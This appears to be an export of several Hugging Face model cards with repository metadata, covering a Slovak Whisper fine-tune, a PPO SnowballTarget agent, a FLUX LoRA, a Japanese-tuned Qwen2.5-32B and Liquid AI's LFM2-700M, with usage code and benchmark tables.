## 📊 Results
Our experiments demonstrate the effectiveness of the proposed approach across various benchmarks.
<div style="display: flex; justify-content: center; align-items: center;">
<img src="imgs/results 1.png" alt="Results 1" width="800"/>
</div>
<br>
<div style="display: flex; justify-content: center; align-items: center;">
<img src="imgs/table 1.png" alt="table 1" width="400"/>
<img src="imgs/table 2.png" alt="table 2" width="400"/>
</div>
For detailed experimental results and further analysis, please refer to the full paper.
---
## 📑 Citation
If you find this code useful in your research, please consider citing our work:
```bibtex
@inproceedings{RepBlend2025neurips,
title={Beyond Modality Collapse: Representations Blending for Multimodal Dataset Distillation},
author={Zhang, Xin and Zhang, Ziruo, and Du, Jiawei and Liu, Zuozhu and Zhou, Joey Tianyi},
booktitle={Adv. Neural Inf. Process. Syst. (NeurIPS)},
year={2025}
}
```
---
## 🎉 Reference
Our code has referred to previous works:
- [LoRS: Low-Rank Similarity Mining](https://github.com/silicx/LoRS_Distill)
- [Vision-Language Dataset Distillation](https://github.com/princetonvisualai/multimodal_dataset_distillation)
- [Scaling Up Dataset Distillation to ImageNet-1K with Constant Memory (TESLA)](https://github.com/justincui03/tesla)
|
dommmm01/SLAXYNI
|
dommmm01
| 2025-09-23T14:59:24Z | 0 | 0 | null |
[
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T14:59:24Z |
---
license: apache-2.0
---
|
erikbozik/whisper-small-sk
|
erikbozik
| 2025-09-23T14:56:52Z | 9 | 0 | null |
[
"safetensors",
"whisper",
"speech",
"asr",
"slovak",
"parliament",
"legal",
"politics",
"sk",
"dataset:erikbozik/slovak-plenary-asr-corpus",
"base_model:openai/whisper-small",
"base_model:finetune:openai/whisper-small",
"license:mit",
"model-index",
"region:us"
] | null | 2025-06-18T12:38:35Z |
---
language:
- sk
tags:
- speech
- asr
- whisper
- slovak
- parliament
- legal
- politics
base_model: openai/whisper-small
datasets:
- erikbozik/slovak-plenary-asr-corpus
metrics:
- wer
model-index:
- name: whisper-small-sk
results:
- task:
type: automatic-speech-recognition
name: Automatic Speech Recognition
dataset:
name: Common Voice 21 (Slovak test set)
type: common_voice
metrics:
- name: WER
type: wer
value: 25.7
- task:
type: automatic-speech-recognition
name: Automatic Speech Recognition
dataset:
name: FLEURS (Slovak test set)
type: fleurs
metrics:
- name: WER
type: wer
value: 10.6
license: mit
---
# Whisper Small — Fine-tuned on Slovak Plenary ASR Corpus
This model is a fine-tuned version of [`openai/whisper-small`](https://huggingface.co/openai/whisper-small).
It is adapted for **Slovak ASR** using the [Slovak Plenary ASR Corpus](https://huggingface.co/datasets/erikbozik/slovak-plenary-asr-corpus): **2,806 hours** of aligned, ≤30 s speech–text pairs from official plenary sessions of the **Slovak National Council**.
- **Language:** Slovak
- **Domain:** Parliamentary / formal speech
- **Training data:** 2,806 h
- **Intended use:** Slovak speech recognition; strongest in formal/public-speaking contexts
## 🧪 Evaluation
| Dataset | Base WER | Fine-tuned WER | Δ (abs) |
|---|---:|---:|---:|
| Common Voice 21 (sk) | 58.4 | **25.7** | -32.7 |
| FLEURS (sk) | 36.1 | **10.6** | -25.5 |
*Numbers from the paper’s final benchmark runs.*
## 🔧 Training Details
- **Framework:** Hugging Face Transformers
- **Hardware:** NVIDIA A10 GPUs
- **Epochs:** up to 3 with early stopping on validation WER
- **Learning rate:** ~**40× smaller** than Whisper pretraining LR
## ⚠️ Limitations
- Domain bias toward parliamentary speech (e.g., political vocabulary, formal register).
- As with Whisper models generally, occasional hallucinations may appear; consider temperature fallback / compression-ratio checks at inference time.
- Multilingual performance is not guaranteed (full-parameter finetuning emphasized Slovak).
## 📄 Paper & Citation
Comming soon
## 🙏 Acknowledgements
This work was supported by [**VÚB Banka**](https://www.vub.sk) who provided the GPU resources and backing necessary to accomplish it, enabling progress in Slovak ASR research.
|
tstenborg/ppo-SnowballTarget
|
tstenborg
| 2025-09-23T14:55:23Z | 0 | 0 |
ml-agents
|
[
"ml-agents",
"tensorboard",
"onnx",
"SnowballTarget",
"deep-reinforcement-learning",
"reinforcement-learning",
"ML-Agents-SnowballTarget",
"region:us"
] |
reinforcement-learning
| 2025-09-23T14:55:19Z |
---
library_name: ml-agents
tags:
- SnowballTarget
- deep-reinforcement-learning
- reinforcement-learning
- ML-Agents-SnowballTarget
---
# **ppo** Agent playing **SnowballTarget**
This is a trained model of a **ppo** agent playing **SnowballTarget**
using the [Unity ML-Agents Library](https://github.com/Unity-Technologies/ml-agents).
## Usage (with ML-Agents)
The Documentation: https://unity-technologies.github.io/ml-agents/ML-Agents-Toolkit-Documentation/
We wrote a complete tutorial to learn to train your first agent using ML-Agents and publish it to the Hub:
- A *short tutorial* where you teach Huggy the Dog 🐶 to fetch the stick and then play with him directly in your
browser: https://huggingface.co/learn/deep-rl-course/unitbonus1/introduction
- A *longer tutorial* to understand how works ML-Agents:
https://huggingface.co/learn/deep-rl-course/unit5/introduction
### Resume the training
```bash
mlagents-learn <your_configuration_file_path.yaml> --run-id=<run_id> --resume
```
### Watch your Agent play
You can watch your agent **playing directly in your browser**
1. If the environment is part of ML-Agents official environments, go to https://huggingface.co/unity
2. Step 1: Find your model_id: tstenborg/ppo-SnowballTarget
3. Step 2: Select your *.nn /*.onnx file
4. Click on Watch the agent play 👀
|
eserder/thibaut_ia_1
|
eserder
| 2025-09-23T14:52:22Z | 0 | 0 |
diffusers
|
[
"diffusers",
"flux",
"lora",
"replicate",
"text-to-image",
"en",
"base_model:black-forest-labs/FLUX.1-dev",
"base_model:adapter:black-forest-labs/FLUX.1-dev",
"license:other",
"region:us"
] |
text-to-image
| 2025-09-23T14:22:16Z |
---
license: other
license_name: flux-1-dev-non-commercial-license
license_link: https://huggingface.co/black-forest-labs/FLUX.1-dev/blob/main/LICENSE.md
language:
- en
tags:
- flux
- diffusers
- lora
- replicate
base_model: "black-forest-labs/FLUX.1-dev"
pipeline_tag: text-to-image
# widget:
# - text: >-
# prompt
# output:
# url: https://...
instance_prompt: eserder
---
# Thibaut_Ia_1
<Gallery />
## About this LoRA
This is a [LoRA](https://replicate.com/docs/guides/working-with-loras) for the FLUX.1-dev text-to-image model. It can be used with diffusers or ComfyUI.
It was trained on [Replicate](https://replicate.com/) using AI toolkit: https://replicate.com/ostris/flux-dev-lora-trainer/train
## Trigger words
You should use `eserder` to trigger the image generation.
## Run this LoRA with an API using Replicate
```py
import replicate
input = {
"prompt": "eserder",
"lora_weights": "https://huggingface.co/eserder/thibaut_ia_1/resolve/main/lora.safetensors"
}
output = replicate.run(
"black-forest-labs/flux-dev-lora",
input=input
)
for index, item in enumerate(output):
with open(f"output_{index}.webp", "wb") as file:
file.write(item.read())
```
## Use it with the [🧨 diffusers library](https://github.com/huggingface/diffusers)
```py
from diffusers import AutoPipelineForText2Image
import torch
pipeline = AutoPipelineForText2Image.from_pretrained('black-forest-labs/FLUX.1-dev', torch_dtype=torch.float16).to('cuda')
pipeline.load_lora_weights('eserder/thibaut_ia_1', weight_name='lora.safetensors')
image = pipeline('eserder').images[0]
```
For more details, including weighting, merging and fusing LoRAs, check the [documentation on loading LoRAs in diffusers](https://huggingface.co/docs/diffusers/main/en/using-diffusers/loading_adapters)
## Training details
- Steps: 2000
- Learning rate: 0.0004
- LoRA rank: 16
## Contribute your own examples
You can use the [community tab](https://huggingface.co/eserder/thibaut_ia_1/discussions) to add images that show off what you’ve made with this LoRA.
|
deep-analysis-research/Flux-Japanese-Qwen2.5-32B-Instruct-V1.0
|
deep-analysis-research
| 2025-09-23T14:52:09Z | 9 | 1 |
transformers
|
[
"transformers",
"safetensors",
"qwen2",
"text-generation",
"chat",
"conversational",
"en",
"base_model:Qwen/Qwen2.5-32B",
"base_model:finetune:Qwen/Qwen2.5-32B",
"license:apache-2.0",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] |
text-generation
| 2025-09-18T05:46:29Z |
---
license: apache-2.0
license_link: https://huggingface.co/Qwen/Qwen2.5-32B-Instruct/blob/main/LICENSE
language:
- en
pipeline_tag: text-generation
base_model: Qwen/Qwen2.5-32B
tags:
- chat
library_name: transformers
---
# Flux-Japanese-Qwen2.5-32B-Instruct-V1.0
[**English**] [[Japanese](./README-ja.md)]
Flux-Japanese-Qwen2.5-32B-Instruct-V1.0 is a 32 billion parameter open-weights models with strong performance in Japanese knowledge, reasoning and language. It is trained based on the Qwen2.5-32B-Instruct and under the Apache 2.0 opensource licence
# 🏆 Open-Japanese-LLM-Leaderboard Rank-1
On the [Open LLM Japanese LLM Leaderboard](https://huggingface.co/spaces/deep-analysis-research/open-japanese-llm-leaderboard), Qwen2.5-32B-Instruct scores 0.6553, compared to the former top-ranked D2IL-Japanese-Qwen2.5-32B-Instruct-v0.1 at 0.7100, and Flux-Japanese-Qwen2.5-32B-V1.0 at 0.7417. Compared with the original Qwen2.5-32B-Instruct, Flux-Japanese-Qwen2.5-32B-v1.0 demonstrates significant gains across most tasks, with especially strong improvements in FA (Fundamental Analysis, 基礎分析), SUM (Summarization, 要約), and CG (Code Generation, コード生成).
| Tasks | Qwen2.5-32B-Instruct | D2IL-Japanese-Qwen2.5-32B-Instruct-v0.1 | Flux-Japanese-Qwen2.5-32B-Instruct-V1.0 |
|------------------------------------|----------------------|-----------------------------------------|------------------------------------------|
| NLI - 自然言語推論 | 0.8106 | 0.8793 | 0.8846 (+0.0740) |
| QA - 質問応答 | 0.541 | 0.5897 | 0.5965 (+0.0555) |
| RC - 読解力 | 0.9047 | 0.9005 | 0.9261 (+0.0214) |
| MC - 多肢選択式質問応答 | 0.8966 | 0.9139 | 0.9128 (+0.0162) |
| EL - エンティティリンキン | 0.5894 | 0.6782 | 0.6975 (+0.1081) |
| FA - 基礎分析 | 0.2737 | 0.4321 | 0.5185 (+0.2448) |
| MR - 数学的推論 | 0.944 | 0.938 | 0.9420 (-0.0020) |
| MT - 機械翻訳 | 0.8479 | 0.7954 | 0.8389 (-0.0090) |
| HE - 試験問題 | 0.7757 | 0.7902 | 0.7987 (+0.0230) |
| CG - コード生成 | 0.5281 | 0.6084 | 0.7610 (+0.2329) |
| SUM - 要約 | 0.097 | 0.2843 | 0.2827 (+0.1857) |
| **Average** | **0.6553** | **0.71** | **0.7417 (+0.0864)** |
# 🚀 Consistent General Performance
While Flux-Japanese-Qwen2.5-32B-Instruct-V1.0 has been specifically tuned for Japanese, its performance on general capabilities and English tasks remains within 1% of Qwen2.5-32B-Instruct, indicating negligible impact. The evaluation is based on [simple-evals](https://github.com/deep-analysis-research/simple-evals).
| Tasks | Dataset | Qwen2.5-32B-Instruct | Flux-Japanese-Qwen2.5-32B-Instruct-V1.0 |
|---------------------|----------------|----------------------|------------------------------------------|
| General Tasks | MMLU-redux | 80.37 | 80.03 (-0.34) |
| | GPQGA-Diamond | 46.11 | 47.32 (+1.21) |
| | MMLU | 82.84 | 83.39 (+0.55) |
| Math Tasks | MATH-500 | 78.14 | 78.50 (+0.36) |
| | AIME24 | 17.06 | 17.92 (+0.86) |
| | AIME25 | 16.25 | 14.58 (-1.67) |
| | MT-AIME24 | 12.73 | 12.97 (+0.24) |
| Multilingual Tasks | Multi-IF | 71.85 | 63.45 (-8.40) |
| | INCLUDE | 65.16 | 64.64 (-0.52) |
| | MMMLU | 73.43 | 74.08 (+0.65) |
| Coding Tasks | HumanEval | 87.93 | 86.51 (-1.42) |
| Alignment Tasks | IFEval | 78.37 | 77.46 (-0.91) |
| **Average** | | **59.17** | **58.40 (-0.77)** |
# ⚙️ Technical Development
<center><img src="tech-dev.png" alt="technical-development"/></center>
- **Phase 1: Interpretability Analysis & Pinpoint Tuning** — For Japanese Knowledge, Reasoning, and Language, leverage mechanistic interpretability techniques to identify independent pathways/circuits, and apply targeted pinpoint tuning to only 5% of the parameters. This produces three expert models specialized respectively in Japanese knowledge, reasoning, and language.
- **Phase 2: Pinpoint Merging** — Perform pinpoint parameter merging on the three expert models to obtain a unified model that reaches expert-level performance across Japanese knowledge, reasoning, and language [[Code of Pinpoint Merging](https://github.com/deep-analysis-research/SLTA)].
# 🚩 Quickstart
```python
from transformers import AutoModelForCausalLM, AutoTokenizer
device = "cuda" # the device to load the model onto
model = AutoModelForCausalLM.from_pretrained(
"Deep-Analysis-Research/Flux-Japanese-Qwen2.5-32B-V1.0",
torch_dtype="auto",
device_map="auto"
)
tokenizer = AutoTokenizer.from_pretrained("Deep-Analysis-Research/Flux-Japanese-Qwen2.5-32B-V1.0")
prompt = "大規模言語モデルについて簡単に紹介してください。"
messages = [
{"role": "user", "content": prompt}
]
text = tokenizer.apply_chat_template(
messages,
tokenize=False,
add_generation_prompt=True
)
model_inputs = tokenizer([text], return_tensors="pt").to(device)
generated_ids = model.generate(
model_inputs.input_ids,
max_new_tokens=512
)
generated_ids = [
output_ids[len(input_ids):] for input_ids, output_ids in zip(model_inputs.input_ids, generated_ids)
]
response = tokenizer.batch_decode(generated_ids, skip_special_tokens=True)[0]
```
# 💡 Terms of Use
We have employed various techniques to reduce bias, harmful outputs, and other risks in the model. While these efforts help improve safety and reliability, the model, like all Large Language Models, may still generate inaccurate, misleading, biased, or otherwise undesirable content. By downloading, using, or interacting with this model, you acknowledge these limitations and agree to the following:
1. Prohibited Uses
- You may NOT use this model for any illegal, unlawful, or harmful activities, including but not limited to fraud, abuse, harassment, privacy violations, or the creation/dissemination of malicious content.
2. User Responsibility
- You are solely responsible for how you use the model and for any outcomes that result from its use.
- The authors and institutions involved in releasing this model do NOT accept liability for any consequences arising from its use.
3. No Warranty
- The model is provided “as is” without any warranties or guarantees.
|
LiquidAI/LFM2-700M
|
LiquidAI
| 2025-09-23T14:49:20Z | 8,746 | 74 |
transformers
|
[
"transformers",
"safetensors",
"lfm2",
"text-generation",
"liquid",
"edge",
"conversational",
"en",
"ar",
"zh",
"fr",
"de",
"ja",
"ko",
"es",
"license:other",
"autotrain_compatible",
"endpoints_compatible",
"region:us"
] |
text-generation
| 2025-07-10T12:01:39Z |
---
library_name: transformers
license: other
license_name: lfm1.0
license_link: LICENSE
language:
- en
- ar
- zh
- fr
- de
- ja
- ko
- es
pipeline_tag: text-generation
tags:
- liquid
- lfm2
- edge
---
<center>
<div style="text-align: center;">
<img
src="https://cdn-uploads.huggingface.co/production/uploads/61b8e2ba285851687028d395/7_6D7rWrLxp2hb6OHSV1p.png"
alt="Liquid AI"
style="width: 100%; max-width: 66%; height: auto; display: inline-block; margin-bottom: 0.5em; margin-top: 0.5em;"
/>
</div>
<div style="display: flex; justify-content: center;">
<a href="https://playground.liquid.ai/chat">
<svg width="114.8" height="20" viewBox="0 0 900 200" xmlns="http://www.w3.org/2000/svg" role="img" aria-label="Playground" style="margin-bottom: 1em;">
<title>Playground</title>
<g>
<rect fill="#fff" width="200" height="200"></rect>
<rect fill="url(#x)" x="200" width="800" height="200"></rect>
</g>
<g transform="translate(35, 30) scale(0.45, 0.45)">
<path d="M172.314 129.313L172.219 129.367L206.125 188.18C210.671 195.154 213.324 203.457 213.324 212.382C213.324 220.834 210.956 228.739 206.839 235.479L275.924 213.178L167.853 33.6L141.827 76.9614L172.314 129.313Z" fill="black"/>
<path d="M114.217 302.4L168.492 257.003C168.447 257.003 168.397 257.003 168.352 257.003C143.515 257.003 123.385 237.027 123.385 212.387C123.385 203.487 126.023 195.204 130.55 188.24L162.621 132.503L135.966 86.7327L60.0762 213.183L114.127 302.4H114.217Z" fill="black"/>
<path d="M191.435 250.681C191.435 250.681 191.43 250.681 191.425 250.686L129.71 302.4H221.294L267.71 226.593L191.435 250.686V250.681Z" fill="black"/>
</g>
<g transform="translate(50, 0)" aria-hidden="true" fill="#fff" text-anchor="start" font-family="Verdana,DejaVu Sans,sans-serif" font-size="110">
<text x="255" y="148" textLength="619" fill="#000" opacity="0.1">Playground</text>
<text x="245" y="138" textLength="619">Playground</text>
</g>
<linearGradient id="x" x1="0%" y1="0%" x2="100%" y2="0%">
<stop offset="0%" style="stop-color:#000000"></stop>
<stop offset="100%" style="stop-color:#000000"></stop>
</linearGradient>
</svg>
</a>
<a href="https://leap.liquid.ai/?utm_source=huggingface&utm_medium=modelcards">
<svg width="114.8" height="20" viewBox="0 0 900 200" xmlns="http://www.w3.org/2000/svg" role="img" aria-label="Leap" style="margin-bottom: 1em;">
<title>Leap</title>
<g>
<rect fill="#000" width="500" height="200"></rect>
</g>
<g transform="translate(100, 45) scale(3.5, 3.5)" fill="#fff">
<path d="M13.8512 28.0769C12.5435 28.0769 11.4025 27.8205 10.4281 27.3077C9.45375 26.7692 8.68452 26.0128 8.12042 25.0385C7.58196 24.0641 7.31273 22.9359 7.31273 21.6538V3.76923H0.389648V0H11.4666V21.6538C11.4666 22.4744 11.6973 23.1282 12.1589 23.6154C12.6204 24.0769 13.2486 24.3077 14.0435 24.3077H20.582V28.0769H13.8512Z"/>
<path d="M29.6439 28.4615C27.9259 28.4615 26.4131 28.1282 25.1054 27.4615C23.8233 26.7692 22.8362 25.8077 22.1439 24.5769C21.4516 23.3462 21.1054 21.9103 21.1054 20.2692V14.7308C21.1054 13.0641 21.4516 11.6282 22.1439 10.4231C22.8362 9.19231 23.8233 8.24359 25.1054 7.57692C26.4131 6.88462 27.9259 6.53846 29.6439 6.53846C31.3875 6.53846 32.9003 6.88462 34.1823 7.57692C35.4644 8.24359 36.4516 9.19231 37.1439 10.4231C37.8362 11.6282 38.1823 13.0641 38.1823 14.7308V18.5H25.1054V20.2692C25.1054 21.8333 25.49 23.0256 26.2592 23.8462C27.0541 24.6667 28.1951 25.0769 29.6823 25.0769C30.8875 25.0769 31.8618 24.8718 32.6054 24.4615C33.349 24.0256 33.8105 23.3974 33.99 22.5769H38.1054C37.7977 24.3718 36.8746 25.8077 35.3362 26.8846C33.7977 27.9359 31.9003 28.4615 29.6439 28.4615ZM34.1823 16V14.6923C34.1823 13.1538 33.7977 11.9615 33.0285 11.1154C32.2592 10.2692 31.131 9.84615 29.6439 9.84615C28.1823 9.84615 27.0541 10.2692 26.2592 11.1154C25.49 11.9615 25.1054 13.1667 25.1054 14.7308V15.6923L34.49 15.6538L34.1823 16Z"/>
<path d="M46.3596 28.4615C44.1545 28.4615 42.4109 27.8974 41.1288 26.7692C39.8724 25.6154 39.2442 24.0513 39.2442 22.0769C39.2442 20.0769 39.9109 18.5128 41.2442 17.3846C42.6032 16.2308 44.4622 15.6538 46.8211 15.6538H52.7058V13.6923C52.7058 12.5385 52.3468 11.641 51.6288 11C50.9109 10.359 49.8981 10.0385 48.5904 10.0385C47.4365 10.0385 46.475 10.2949 45.7058 10.8077C44.9365 11.2949 44.4878 11.9487 44.3596 12.7692H40.2827C40.5135 10.8718 41.3852 9.35897 42.8981 8.23077C44.4365 7.10256 46.3724 6.53846 48.7058 6.53846C51.2186 6.53846 53.2058 7.17949 54.6673 8.46154C56.1288 9.71795 56.8596 11.4359 56.8596 13.6154V28.0769H52.8211V24.1923H52.1288L52.8211 23.4231C52.8211 24.9615 52.2314 26.1923 51.0519 27.1154C49.8724 28.0128 48.3083 28.4615 46.3596 28.4615ZM47.5904 25.2692C49.0776 25.2692 50.2955 24.8974 51.2442 24.1538C52.2186 23.3846 52.7058 22.4103 52.7058 21.2308V18.4615H46.8981C45.8211 18.4615 44.9622 18.7564 44.3211 19.3462C43.7058 19.9359 43.3981 20.7436 43.3981 21.7692C43.3981 22.8462 43.7699 23.7051 44.5135 24.3462C45.257 24.9615 46.2827 25.2692 47.5904 25.2692Z"/>
<path d="M58.9984 35V6.92308H63.1138V10.9615H63.9984L63.1138 11.9231C63.1138 10.2564 63.6266 8.94872 64.6523 8C65.7036 7.02564 67.101 6.53846 68.8446 6.53846C70.9728 6.53846 72.6651 7.25641 73.9215 8.69231C75.2036 10.1026 75.8446 12.0385 75.8446 14.5V20.4615C75.8446 22.1026 75.5497 23.5256 74.96 24.7308C74.3959 25.9103 73.5882 26.8333 72.5369 27.5C71.5113 28.141 70.2805 28.4615 68.8446 28.4615C67.1266 28.4615 65.742 27.9872 64.6907 27.0385C63.6395 26.0641 63.1138 24.7436 63.1138 23.0769L63.9984 24.0385H63.0369L63.1523 28.9615V35H58.9984ZM67.4215 24.8462C68.7805 24.8462 69.8318 24.4615 70.5754 23.6923C71.3446 22.8974 71.7292 21.7564 71.7292 20.2692V14.7308C71.7292 13.2436 71.3446 12.1154 70.5754 11.3462C69.8318 10.5513 68.7805 10.1538 67.4215 10.1538C66.1138 10.1538 65.0754 10.5641 64.3061 11.3846C63.5369 12.1795 63.1523 13.2949 63.1523 14.7308V20.2692C63.1523 21.7051 63.5369 22.8333 64.3061 23.6538C65.0754 24.4487 66.1138 24.8462 67.4215 24.8462Z"/>
</g>
<linearGradient id="y" x1="0%" y1="0%" x2="100%" y2="0%">
<stop offset="0%" style="stop-color:#000000"></stop>
</linearGradient>
</svg>
</a>
</div>
</center>
# LFM2-700M
LFM2 is a new generation of hybrid models developed by [Liquid AI](https://www.liquid.ai/), specifically designed for edge AI and on-device deployment. It sets a new standard in terms of quality, speed, and memory efficiency.
We're releasing the weights of four post-trained checkpoints with 350M, 700M, 1.2B, and 2.6 parameters. They provide the following key features to create AI-powered edge applications:
* **Fast training & inference** – LFM2 achieves 3x faster training compared to its previous generation. It also benefits from 2x faster decode and prefill speed on CPU compared to Qwen3.
* **Best performance** – LFM2 outperforms similarly-sized models across multiple benchmark categories, including knowledge, mathematics, instruction following, and multilingual capabilities.
* **New architecture** – LFM2 is a new hybrid Liquid model with multiplicative gates and short convolutions.
* **Flexible deployment** – LFM2 runs efficiently on CPU, GPU, and NPU hardware for flexible deployment on smartphones, laptops, or vehicles.
Find more information about LFM2 in our [blog post](https://www.liquid.ai/blog/liquid-foundation-models-v2-our-second-series-of-generative-ai-models).
## 📄 Model details
Due to their small size, **we recommend fine-tuning LFM2 models on narrow use cases** to maximize performance.
They are particularly suited for agentic tasks, data extraction, RAG, creative writing, and multi-turn conversations.
However, we do not recommend using them for tasks that are knowledge-intensive or require programming skills.
| Property | [**LFM2-350M**](https://huggingface.co/LiquidAI/LFM2-350M) | [**LFM2-700M**](https://huggingface.co/LiquidAI/LFM2-700M) | [**LFM2-1.2B**](https://huggingface.co/LiquidAI/LFM2-1.2B) | [**LFM2-2.6B**](https://huggingface.co/LiquidAI/LFM2-2.6B) |
| ------------------- | ----------------------------- | ----------------------------- | ----------------------------- | ----------------------------- |
| **Parameters** | 354,483,968 | 742,489,344 | 1,170,340,608 | 2,569,272,320 |
| **Layers** | 16 (10 conv + 6 attn) | 16 (10 conv + 6 attn) | 16 (10 conv + 6 attn) | 30 (22 conv + 8 attn) |
| **Context length** | 32,768 tokens | 32,768 tokens | 32,768 tokens | 32,768 tokens |
| **Vocabulary size** | 65,536 | 65,536 | 65,536 | 65,536 |
| **Precision** | bfloat16 | bfloat16 | bfloat16 | bfloat16 |
| **Training budget** | 10 trillion tokens | 10 trillion tokens | 10 trillion tokens | 10 trillion tokens |
| **License** | LFM Open License v1.0 | LFM Open License v1.0 | LFM Open License v1.0 | LFM Open License v1.0 |
**Supported languages**: English, Arabic, Chinese, French, German, Japanese, Korean, and Spanish.
**Generation parameters**: We recommend the following parameters:
* `temperature=0.3`
* `min_p=0.15`
* `repetition_penalty=1.05`
**Chat template**: LFM2 uses a ChatML-like chat template as follows:
```
<|startoftext|><|im_start|>system
You are a helpful assistant trained by Liquid AI.<|im_end|>
<|im_start|>user
What is C. elegans?<|im_end|>
<|im_start|>assistant
It's a tiny nematode that lives in temperate soil environments.<|im_end|>
```
You can automatically apply it using the dedicated [`.apply_chat_template()`](https://huggingface.co/docs/transformers/en/chat_templating#applychattemplate) function from Hugging Face transformers.
**Tool use**: It consists of four main steps:
1. **Function definition**: LFM2 takes JSON function definitions as input (JSON objects between `<|tool_list_start|>` and `<|tool_list_end|>` special tokens), usually in the system prompt
2. **Function call**: LFM2 writes Pythonic function calls (a Python list between `<|tool_call_start|>` and `<|tool_call_end|>` special tokens), as the assistant answer.
3. **Function execution**: The function call is executed and the result is returned (string between `<|tool_response_start|>` and `<|tool_response_end|>` special tokens), as a "tool" role.
4. **Final answer**: LFM2 interprets the outcome of the function call to address the original user prompt in plain text.
Here is a simple example of a conversation using tool use:
```
<|startoftext|><|im_start|>system
List of tools: <|tool_list_start|>[{"name": "get_candidate_status", "description": "Retrieves the current status of a candidate in the recruitment process", "parameters": {"type": "object", "properties": {"candidate_id": {"type": "string", "description": "Unique identifier for the candidate"}}, "required": ["candidate_id"]}}]<|tool_list_end|><|im_end|>
<|im_start|>user
What is the current status of candidate ID 12345?<|im_end|>
<|im_start|>assistant
<|tool_call_start|>[get_candidate_status(candidate_id="12345")]<|tool_call_end|>Checking the current status of candidate ID 12345.<|im_end|>
<|im_start|>tool
<|tool_response_start|>{"candidate_id": "12345", "status": "Interview Scheduled", "position": "Clinical Research Associate", "date": "2023-11-20"}<|tool_response_end|><|im_end|>
<|im_start|>assistant
The candidate with ID 12345 is currently in the "Interview Scheduled" stage for the position of Clinical Research Associate, with an interview date set for 2023-11-20.<|im_end|>
```
**Architecture**: Hybrid model with multiplicative gates and short convolutions: 10 double-gated short-range LIV convolution blocks and 6 grouped query attention (GQA) blocks.
**Pre-training mixture**: Approximately 75% English, 20% multilingual, and 5% code data sourced from the web and licensed materials.
**Training approach**:
* Knowledge distillation using [LFM1-7B](https://www.liquid.ai/blog/introducing-lfm-7b-setting-new-standards-for-efficient-language-models) as teacher model
* Very large-scale SFT on 50% downstream tasks, 50% general domains
* Custom DPO with length normalization and semi-online datasets
* Iterative model merging
## 🏃 How to run LFM2
### 1. Transformers
To run LFM2, you need to install Hugging Face [`transformers`](https://github.com/huggingface/transformers) v4.55 or a more recent version as follows:
```bash
pip install -U transformers
```
Here is an example of how to generate an answer with transformers in Python:
```python
from transformers import AutoModelForCausalLM, AutoTokenizer
# Load model and tokenizer
model_id = "LiquidAI/LFM2-1.2B"
model = AutoModelForCausalLM.from_pretrained(
model_id,
device_map="auto",
torch_dtype="bfloat16",
# attn_implementation="flash_attention_2" <- uncomment on compatible GPU
)
tokenizer = AutoTokenizer.from_pretrained(model_id)
# Generate answer
prompt = "What is C. elegans?"
input_ids = tokenizer.apply_chat_template(
[{"role": "user", "content": prompt}],
add_generation_prompt=True,
return_tensors="pt",
tokenize=True,
).to(model.device)
output = model.generate(
input_ids,
do_sample=True,
temperature=0.3,
min_p=0.15,
repetition_penalty=1.05,
max_new_tokens=512,
)
print(tokenizer.decode(output[0], skip_special_tokens=False))
# <|startoftext|><|im_start|>user
# What is C. elegans?<|im_end|>
# <|im_start|>assistant
# C. elegans, also known as Caenorhabditis elegans, is a small, free-living
# nematode worm (roundworm) that belongs to the phylum Nematoda.
```
You can directly run and test the model with this [Colab notebook](https://colab.research.google.com/drive/1_q3jQ6LtyiuPzFZv7Vw8xSfPU5FwkKZY?usp=sharing).
### 2. vLLM
You need to install [`vLLM`](https://github.com/vllm-project/vllm) v0.10.2 or a more recent version as follows:
```bash
uv pip install vllm==0.10.2 --extra-index-url https://wheels.vllm.ai/0.10.2/ --torch-backend=auto
```
Here is an example of how to use it for inference:
```python
from vllm import LLM, SamplingParams
prompts = [
"What is C. elegans?",
"Say hi in JSON format",
"Define AI in Spanish"
]
sampling_params = SamplingParams(
temperature=0.3,
min_p=0.15,
repetition_penalty=1.05
)
llm = LLM(model="LiquidAI/LFM2-700M")
outputs = llm.generate(prompts, sampling_params)
for output in outputs:
prompt = output.prompt
generated_text = output.outputs[0].text
print(f"Prompt: {prompt!r}, Generated text: {generated_text!r}")
```
### 3. llama.cpp
You can run LFM2 with llama.cpp using its [GGUF checkpoint](https://huggingface.co/LiquidAI/LFM2-700M-GGUF). Find more information in the model card.
## 🔧 How to fine-tune LFM2
We recommend fine-tuning LFM2 models on your use cases to maximize performance.
| Notebook | Description | Link |
|-------|------|------|
| SFT (Unsloth) | Supervised Fine-Tuning (SFT) notebook with a LoRA adapter using Unsloth. | <a href="https://colab.research.google.com/drive/1HROdGaPFt1tATniBcos11-doVaH7kOI3?usp=sharing"><img src="https://cdn-uploads.huggingface.co/production/uploads/61b8e2ba285851687028d395/vlOyMEjwHa_b_LXysEu2E.png" width="110" alt="Colab link"></a> |
| SFT (Axolotl) | Supervised Fine-Tuning (SFT) notebook with a LoRA adapter using Axolotl. | <a href="https://colab.research.google.com/drive/155lr5-uYsOJmZfO6_QZPjbs8hA_v8S7t?usp=sharing"><img src="https://cdn-uploads.huggingface.co/production/uploads/61b8e2ba285851687028d395/vlOyMEjwHa_b_LXysEu2E.png" width="110" alt="Colab link"></a> |
| SFT (TRL) | Supervised Fine-Tuning (SFT) notebook with a LoRA adapter using TRL. | <a href="https://colab.research.google.com/drive/1j5Hk_SyBb2soUsuhU0eIEA9GwLNRnElF?usp=sharing"><img src="https://cdn-uploads.huggingface.co/production/uploads/61b8e2ba285851687028d395/vlOyMEjwHa_b_LXysEu2E.png" width="110" alt="Colab link"></a> |
| DPO (TRL) | Preference alignment with Direct Preference Optimization (DPO) using TRL. | <a href="https://colab.research.google.com/drive/1MQdsPxFHeZweGsNx4RH7Ia8lG8PiGE1t?usp=sharing"><img src="https://cdn-uploads.huggingface.co/production/uploads/61b8e2ba285851687028d395/vlOyMEjwHa_b_LXysEu2E.png" width="110" alt="Colab link"></a> |
## 📈 Performance
LFM2 outperforms similar-sized models across different evaluation categories.
### 1. Automated benchmarks

| Model | MMLU | GPQA | IFEval | IFBench | GSM8K | MGSM | MMMLU |
|-------|------|------|--------|---------|-------|------|-------|
| LFM2-350M | 43.43 | 27.46 | 65.12 | 16.41 | 30.1 | 29.52 | 37.99 |
| LFM2-700M | 49.9 | 28.48 | 72.23 | 20.56 | 46.4 | 45.36 | 43.28 |
| LFM2-1.2B | *55.23* | **31.47** | **74.89** | *20.7* | *58.3* | *55.04* | **46.73** |
